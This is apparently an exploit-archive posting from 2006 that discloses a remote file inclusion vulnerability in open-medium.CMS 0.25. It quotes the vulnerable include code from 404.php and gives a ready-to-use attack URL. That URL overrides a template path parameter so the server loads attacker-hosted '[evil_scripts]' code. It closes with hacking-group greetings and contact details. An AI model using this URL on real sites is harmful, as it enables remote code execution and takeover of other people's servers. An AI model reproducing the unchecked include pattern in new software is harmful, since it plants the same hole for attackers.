[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability
# Published : 2006-05-25
# Author : Kacper
# Previous Title : BASE <= 1.2.4 melissa (Snort Frontend) Remote Inclusion Vulnerabilities
# Next Title : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability
################ DEVIL TEAM THE BEST POLISH TEAM #################
#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
##################################################################
[code]
404.php:
.......
} else {
// templates verwenden
if
(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
{
include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
}
}
?>
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]
###################################################################
#Elo ;-)
# www.Syue.com [2006-05-25]